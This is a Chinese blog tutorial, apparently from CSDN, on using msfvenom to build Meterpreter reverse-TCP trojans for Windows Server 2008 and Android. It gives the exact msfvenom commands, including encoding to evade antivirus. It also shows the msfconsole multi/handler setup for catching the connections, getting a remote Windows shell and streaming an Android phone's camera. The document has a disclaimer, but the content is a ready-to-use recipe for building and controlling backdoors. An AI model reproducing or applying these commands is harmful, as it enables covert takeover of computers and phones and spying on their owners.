msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规

一、使用环境

  1. VMware V15.5.0
  2. Kali-Linux-2020.2
  3. msfconsole
  4. msfvenom
  5. Windows Server 2008 R2 Enterprise
  6. Android10 & EMUI10.1

二、msfvenom编写Trojan木马

在Kali的终端使用msfvenom命令制作后门木马程序

Ⅰ、电脑端.exe格式

在终端输入以下指令以生成木马

msfvenom -p windows/meterpreter_reverse_tcp LHOST={Kali系统IP} LPORT={监听端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5
可选参数描述
-p使用平台
-e编码方式
-f文件格式
-o存储为
-i编译次数
-x捆绑软件

平台选择windows/meterpreter_reverse_tcp
在这里插入图片描述

Ⅱ、移动端.apk格式

msfvenom -p android/meterpreter_reverse_tcp R > /home/用户名/桌面/{文件名}.apk

平台选择android/meterpreter_reverse_tcp
保存方式与电脑端不同
在这里插入图片描述

三、msfconsole控制感染对象

两平台主要操作相同,区别在于参数

当在Windows中打开制作好的木马后,后门便会自动开放,程序后台静默运行
在Android打开后也是同理。安全软件会直接识别并报毒
在这里插入图片描述

在Kali终端使用msfconsole控制感染对象
加载exploit/multi/handler模块
在这里插入图片描述
设置载荷,Windows和Android的载荷与制作程序时输入的-p参数一致
windows/meterpreter_reverse_tcp
android/meterpreter_reverse_tcp

最后再设置LHOST和LPORT与程序的参数一致
指向Kali系统IP

配置完毕,run运行监听
在这里插入图片描述

Ⅰ、电脑端示例:shell获取Windows的CMD

在这里插入图片描述

Ⅱ、移动端示例:webcam_stream获取Android摄像头实时画面

在这里插入图片描述

提高警惕,切勿安装不明来源的程序软件

欢迎在评论区留言
感谢浏览

评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值